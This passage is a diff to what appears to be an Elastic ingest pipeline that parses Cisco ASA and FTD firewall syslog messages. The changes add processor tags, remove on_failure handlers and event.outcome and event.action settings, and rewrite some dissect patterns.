%{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}" + pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '338201'" + tag: parse_338201 field: "message" description: "338201" - pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338201'" field: "server.domain" @@ -768,9 +718,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338202'" + tag: parse_338202 field: "message" description: "338202" - pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338202'" field: "server.domain" @@ -779,9 +730,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338203'" + tag: parse_338203 field: "message" description: "338203" - pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338203'" field: "server.domain" @@ -790,9 +742,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338204'" + tag: parse_338204 field: "message" description: "338204" - pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338204'" field: "server.domain" @@ -801,6 +754,7 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338301'" + tag: parse_338301 field: "message" description: "338301" pattern: "Intercepted DNS reply for domain %{source.domain} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, matched %{_temp_.cisco.list_id}" @@ -830,45 +784,38 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '502103'" + tag: parse_502103 field: "message" description: "502103" pattern: "User priv level changed: Uname: %{server.user.name} From: %{_temp_.cisco.privilege.old} To: %{_temp_.cisco.privilege.new}" - - append: - if: "ctx._temp_.cisco.message_id == '502103'" - field: "event.type" - description: "502103" - value: - - "group" - - "change" - - append: - if: "ctx._temp_.cisco.message_id == '502103'" - field: "event.category" - description: "502103" - value: "iam" - dissect: if: "ctx._temp_.cisco.message_id == '507003'" + tag: parse_507003 field: "message" description: "507003" pattern: "%{network.transport} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} terminated by inspection engine, reason - %{message}" - dissect: if: '["605004", "605005"].contains(ctx._temp_.cisco.message_id)' + tag: parse_605004-605005 field: "message" description: "605004, 605005" - pattern: 'Login %{event.outcome} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{network.protocol} for user "%{source.user.name}"' + pattern: 'Login %{} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{network.protocol} for user "%{source.user.name}"' - dissect: if: "ctx._temp_.cisco.message_id == '609001'" + tag: parse_609001 field: "message" description: "609001" pattern: "Built local-host %{_temp_.cisco.source_interface}:%{source.address}" - dissect: if: "ctx._temp_.cisco.message_id == '607001'" + tag: parse_607001 field: "message" description: "607001" pattern: "Pre-allocate SIP %{_temp_.cisco.connection_type} secondary channel for %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} to %{_temp_.cisco.source_interface}:%{source.address} from %{_temp_.cisco.message} message" - grok: if: "ctx._temp_.cisco.message_id == '607001'" + tag: parse_607001_connection_type description: "607001" - tag: "grok_connection_type" field: "_temp_.cisco.connection_type" patterns: - "%{CONNECTION}" @@ -876,48 +823,41 @@ processors: TRANSPORTS: "(?:UDP|TCP)" PROTOCOLS: "(?:RTP|RTCP)" CONNECTION: "(?:%{TRANSPORTS:network.transport}|%{PROTOCOLS:network.protocol})" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - dissect: if: "ctx._temp_.cisco.message_id == '609002'" + tag: parse_609002 field: "message" description: "609002" pattern: "Teardown local-host %{_temp_.cisco.source_interface}:%{source.address} duration %{_temp_.duration_hms}" - dissect: if: '["611102", "611101"].contains(ctx._temp_.cisco.message_id)' + tag: parse_611101-611102 field: "message" description: "611102, 611101" - pattern: 'User authentication %{event.outcome}: IP address: %{source.address}, Uname: %{server.user.name}' + pattern: 'User authentication %{}: IP address: %{source.address}, Uname: %{server.user.name}' - dissect: if: "ctx._temp_.cisco.message_id == '710003'" + tag: parse_710003 field: "message" description: "710003" - pattern: "%{network.transport} access %{event.outcome} by ACL from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "%{network.transport} access denied by ACL from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '710005'" + tag: parse_710005 field: "message" description: "710005" - pattern: "%{network.transport} request %{event.outcome} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "%{network.transport} request discarded from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - grok: if: "ctx._temp_.cisco.message_id == '713049'" - tag: "grok_message_713049" + tag: parse_713049 field: "message" description: "713049" - patterns: + patterns: - "Group = %{NOTSPACE}, IP = %{IP:source.address}, Security negotiation complete for LAN-to-LAN Group (%{DATA}) %{DATA}, Inbound SPI = %{DATA}, Outbound SPI = %{DATA}" - "Group = %{NOTSPACE}, Username = %{NOTSPACE:user.name}, IP = %{IP:source.address}, Security negotiation complete for User (%{DATA}) %{DATA}, Inbound SPI = %{DATA}, Outbound SPI = %{DATA}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: if: "ctx._temp_.cisco.message_id == '716002'" + tag: parse_716002 field: "message" description: "716002" patterns: @@ -925,13 +865,23 @@ processors: - "Group %{NOTSPACE:_temp_.cisco.webvpn.group_name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} WebVPN session terminated: %{GREEDYDATA:event.reason}." - grok: if: "ctx._temp_.cisco.message_id == '722011'" + tag: parse_722011 field: "message" description: "722011" patterns: - 'Group <%{NOTSPACE:source.user.group.name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> SVC Message: %{GREEDYDATA:event.reason}\.' - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} SVC Message: %{GREEDYDATA:event.reason}\.' + - grok: + if: '["722022", "722023"].contains(ctx._temp_.cisco.message_id)' + tag: parse_722022-722023 + field: "message" + description: "722022, 722023" + patterns: + - 'Group <%{NOTSPACE:source.user.group.name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> %{GREEDYDATA:event.reason}' + - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} %{GREEDYDATA:event.reason}' - grok: if: "ctx._temp_.cisco.message_id == '722033'" + tag: parse_722033 field: "message" description: "722033" patterns: @@ -939,6 +889,7 @@ processors: - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} First %{NOTSPACE:network.transport} SVC connection established for SVC session\.' - grok: if: "ctx._temp_.cisco.message_id == '722034'" + tag: parse_722034 field: "message" description: "722034" patterns: @@ -946,6 +897,7 @@ processors: - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} New %{NOTSPACE:network.transport} SVC connection, no existing connection\.' - grok: if: "ctx._temp_.cisco.message_id == '722037'" + tag: parse_722037 field: "message" description: "722037" patterns: @@ -953,6 +905,7 @@ processors: - 'Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} SVC closing connection: %{GREEDYDATA:event.reason}\.' - grok: if: "ctx._temp_.cisco.message_id == '722051'" + tag: parse_722051 field: "message" description: "722051" patterns: @@ -960,170 +913,105 @@ processors: - "Group %{NOTSPACE:source.user.group.name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} IPv4 Address %{IP:_temp_.cisco.assigned_ip} %{GREEDYDATA}" - grok: if: "ctx._temp_.cisco.message_id == '733100'" + tag: parse_733100 field: "message" description: "733100" patterns: - \[(%{SPACE})?%{DATA:_temp_.cisco.burst.object}\] drop %{NOTSPACE:_temp_.cisco.burst.id} exceeded. Current burst rate is %{INT:_temp_.cisco.burst.current_rate} per second, max configured rate is %{INT:_temp_.cisco.burst.configured_rate}; Current average rate is %{INT:_temp_.cisco.burst.avg_rate} per second, max configured rate is %{INT:_temp_.cisco.burst.configured_avg_rate}; Cumulative total count is %{INT:_temp_.cisco.burst.cumulative_count} - dissect: if: "ctx._temp_.cisco.message_id == '734001'" + tag: parse_734001 field: "message" description: "734001" pattern: "DAP: User %{user.email}, Addr %{source.address}, Connection %{_temp_.cisco.connection_type}: The following DAP records were selected for this connection: %{_temp_.cisco.dap_records->}" - dissect: if: "ctx._temp_.cisco.message_id == '805001'" + tag: parse_805001 field: "message" description: "805001" pattern: "Offloaded %{network.transport} Flow for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - dissect: if: "ctx._temp_.cisco.message_id == '805002'" + tag: parse_805002 field: "message" description: "805002" pattern: "%{network.transport} Flow is no longer offloaded for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - split: field: "_temp_.cisco.dap_records" + tag: split_dap_records separator: ",\\s+" ignore_missing: true - dissect: if: "ctx._temp_.cisco.message_id == '434002'" + tag: parse_434002 field: "message" - pattern: "SFR requested to %{event.action} %{network.protocol} packet from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "SFR requested to drop %{network.protocol} packet from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '434004'" + tag: parse_434004 field: "message" - pattern: "SFR requested ASA to %{event.action} further packet redirection and process %{network.protocol} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} locally" + pattern: "SFR requested ASA to bypass further packet redirection and process %{network.protocol} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} locally" - dissect: if: "ctx._temp_.cisco.message_id == '110002'" + tag: parse_110002 field: "message" pattern: "%{event.reason} for %{network.protocol} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '419002'" + tag: parse_419002 field: "message" pattern: "%{event.reason}from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{+event.reason}" - dissect: if: '["602303", "602304"].contains(ctx._temp_.cisco.message_id)' + tag: parse_602303-602304 field: "message" - pattern: "%{network.type}: An %{network.direction} %{_temp_.cisco.tunnel_type} SA (SPI= %{}) between %{source.address} and %{destination.address} (user= %{user.name}) has been %{event.action}." + pattern: "%{network.type}: An %{network.direction} %{_temp_.cisco.tunnel_type} SA (SPI= %{}) between %{source.address} and %{destination.address} (user= %{user.name}) has been %{}." - dissect: if: "ctx._temp_.cisco.message_id == '750002'" + tag: parse_750002 field: "message" pattern: "Local:%{source.address}:%{source.port} Remote:%{destination.address}:%{destination.port} Username:%{user.name} %{event.reason}" - dissect: if: "ctx._temp_.cisco.message_id == '713120'" + tag: parse_713120 field: "message" pattern: "Group = %{}, IP = %{source.address}, %{event.reason} (msgid=%{event.id})" - dissect: if: "ctx._temp_.cisco.message_id == '713202'" + tag: parse_713202 field: "message" pattern: "IP = %{source.address}, %{event.reason}. %{} packet." # Support masked user - grok: if: "ctx._temp_.cisco.message_id == '716039'" + tag: parse_716039 field: "message" patterns: - "Authentication: rejected, group = %{NOTSPACE:source.user.group.name} user = %{USER:source.user.name} , Session Type: %{NOTSPACE:_temp_.cisco.session_type}" - "Group <%{NOTSPACE:source.user.group.name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> Authentication: rejected, Session Type: %{NOTSPACE:_temp_.cisco.session_type}\\." - dissect: if: "ctx._temp_.cisco.message_id == '750003'" + tag: parse_750003 field: "message" pattern: "Local:%{source.address}:%{source.port} Remote:%{destination.address}:%{destination.port} Username:%{user.name} %{event.reason} ERROR:%{+event.reason}" - grok: if: '["713905", "713904", "713906", "713902", "713901"].contains(ctx._temp_.cisco.message_id)' + tag: parse_713901-713906 field: "message" patterns: - "^(Group = %{IP}, )?(IP = %{IP:source.address}, )?%{GREEDYDATA:event.reason}$" - # Handle ecs action outcome protocol - - set: - if: '["434002", "434004"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "unknown" - set: if: '["419002"].contains(ctx._temp_.cisco.message_id)' + tag: parse_419002 field: "network.protocol" value: "tcp" - - set: - if: '["110002"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "dropped" - - set: - if: '["713120"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["113004", "113012"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["113002", "113005", "113021"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: '["602303", "602304", "611101"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["605004", "611102"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: '["734001"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "success" - - set: - if: '["716039"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: '["710005"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "dropped" - - set: - if: '["713901", "713902", "713903", "713904", "713905"].contains(ctx._temp_.cisco.message_id)' - field: "event.outcome" - value: "failure" - - set: - if: '["113039"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "client-vpn-connected" - - set: - if: '["113029","113030","113031","113032","113033","113034","113035","113036","113037","113038","113040"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "client-vpn-error" - - set: - if: '["113019"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "client-vpn-disconnected" - - set: - if: '["750002", "750003"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "connection-started" - - set: - if: '["750003", "713905", "713904", "713906", "713902", "713901"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "error" - - set: - if: '["113005", "113021", "605004", "611102", "716039"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "logon-failed" - - set: - if: '["113004", "113012", "611101", "734001"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "logged-in" - - append: - if: '["750003", "713905", "713904", "713906", "713902", "713901"].contains(ctx._temp_.cisco.message_id)' - field: "event.type" - value: "error" # # Handle 302xxx messages (Flow expiration a.k.a "Teardown") # - - set: - if: '["305012", "302014", "302016", "302018", "302021", "302036", "302304", "302306", "609001", "609002"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "flow-expiration" - description: "305012, 302014, 302016, 302018, 302021, 302036, 302304, 302306, 609001, 609002" - grok: field: "message" - tag: "grok_message_302xxx_teardown" + tag: parse_302xxx if: '["302014", "302016", "302018", "302021", "302036", "302304", "302306"].contains(ctx._temp_.cisco.message_id)' description: "302014, 302016, 302018, 302021, 302036, 302304, 302306" patterns: @@ -1135,7 +1023,7 @@ processors: - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER_OR_SGT_SRC}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER_OR_SGT_DST}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) - ^Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(?%{CISCO_USER_OR_SGT_DST}\)? )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{CISCO_USER_OR_SGT_SRC}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" @@ -1146,12 +1034,6 @@ processors: CISCO_USER_OR_SGT_DST: (?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt})\)) CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?%{CISCO_SGT}?)|[^$]+) CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Decode FTD's Security Event Syslog Messages @@ -1170,12 +1052,6 @@ processors: target_field: "_temp_.orig_security" trim_key: " " trim_value: " " - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Remove _temp_.full_message. @@ -1186,6 +1062,7 @@ processors: - rename: description: Retain full log message without the Cisco codes for later search. if: ctx.tags != null && ctx.tags.contains('keep_message') && ctx._temp_?.cisco?.full_message == null + tag: rename_full_message field: message target_field: _temp_.cisco.full_message - remove: @@ -1218,6 +1095,7 @@ processors: #******************************************************************************* - script: if: ctx._temp_?.orig_security != null + tag: script_ftd_events params: ACPolicy: target: ac_policy @@ -1582,6 +1460,7 @@ processors: # Normalize ECS field values # - script: + tag: script_normalize_ftd_events lang: painless params: "ctx._temp_.cisco.message_id": @@ -1677,6 +1556,7 @@ processors: # This will fill event.start, event.end and event.duration # - script: + tag: script_process_flow_duration lang: painless if: "ctx?._temp_?.duration_hms != null" source: > @@ -1715,18 +1595,12 @@ processors: - '%{CISCO_DOMAIN_USER:_temp_.cisco.source_username}\$?\)?%{CISCO_SGT}' - '%{CISCO_DOMAIN_USER:_temp_.cisco.source_username}\$?\)?' pattern_definitions: - CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER}? - CISCO_USER: "[^,$)]+" + CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER} + CISCO_USER: "[^,$)]*" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME}\\)? CISCO_SGT: (, *(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}|%{CISCO_SGT_TAG}))|(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}) CISCO_SGT_TAG: (%{NUMBER:_temp_.cisco.source_user_security_group_tag}) CISCO_SGT_NAME: (%{WORD:_temp_.cisco.source_user_security_group_tag_name}) - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # Parse Source without User only containing SGT - grok: field: "_temp_.cisco.source_sgt" @@ -1736,14 +1610,9 @@ processors: - '%{CISCO_SGT}' pattern_definitions: CISCO_SGT: (, *)?(%{NUMBER:_temp_.cisco.source_user_security_group_tag})?:?%{WORD:_temp_.cisco.source_user_security_group_tag_name}? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.source_user_security_group_tag + tag: convert_source_user_security_group_tag type: long ignore_missing: true - grok: @@ -1754,18 +1623,12 @@ processors: - '%{CISCO_DOMAIN_USER:_temp_.cisco.destination_username}\$?\)?%{CISCO_SGT}' - '%{CISCO_DOMAIN_USER:_temp_.cisco.destination_username}\$?\)?' pattern_definitions: - CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER}? - CISCO_USER: "[^,$)]+" + CISCO_DOMAIN_USER: (%{CISCO_DOMAIN})?%{CISCO_USER} + CISCO_USER: "[^,$)]*" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME}\\)? CISCO_SGT: (, *(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}|%{CISCO_SGT_TAG}))|(%{CISCO_SGT_TAG}:%{CISCO_SGT_NAME}) CISCO_SGT_TAG: (%{NUMBER:_temp_.cisco.destination_user_security_group_tag}) CISCO_SGT_NAME: (%{WORD:_temp_.cisco.destination_user_security_group_tag_name}) - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # Parse Destination without User only containing SGT - grok: field: "_temp_.cisco.destination_sgt" @@ -1775,14 +1638,9 @@ processors: - '%{CISCO_SGT}' pattern_definitions: CISCO_SGT: (, *)?(%{NUMBER:_temp_.cisco.destination_user_security_group_tag})?:?%{WORD:_temp_.cisco.destination_user_security_group_tag_name}? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - convert: field: _temp_.cisco.destination_user_security_group_tag + tag: convert_destination_user_security_group_tag type: long ignore_missing: true - remove: @@ -1798,10 +1656,12 @@ processors: field: _temp_.cisco.destination_username if: ctx._temp_?.cisco?.destination_username != null && ctx._temp_.cisco.destination_username == "" - set: + tag: set_source_user_name field: source.user.name value: "{{{ _temp_.cisco.source_username }}}" if: 'ctx?.source?.user?.name == null && ctx._temp_?.cisco?.source_username != null' - set: + tag: set_destination_user_name field: destination.user.name value: "{{{ _temp_.cisco.destination_username }}}" if: 'ctx?.destination?.user?.name == null && ctx._temp_?.cisco?.destination_username != null' @@ -1819,12 +1679,6 @@ processors: CISCO_USER_EMAIL: "%{CISCO_USER}@%{HOSTNAME:source.user.domain}" CISCO_USER: "%{USERNAME:source.user.name}" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME:source.user.domain}\\)? - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - grok: field: "destination.user.name" tag: "grok_destination_user_name" @@ -1837,12 +1691,6 @@ processors: CISCO_USER_EMAIL: "%{CISCO_USER}@%{HOSTNAME:destination.user.domain}" CISCO_USER: "%{USERNAME:destination.user.name}" CISCO_DOMAIN: (LOCAL\\)?(%{HOSTNAME:destination.user.domain}\\)? - on_failure: - - append: - field: error.message - value: "fail-{{{ 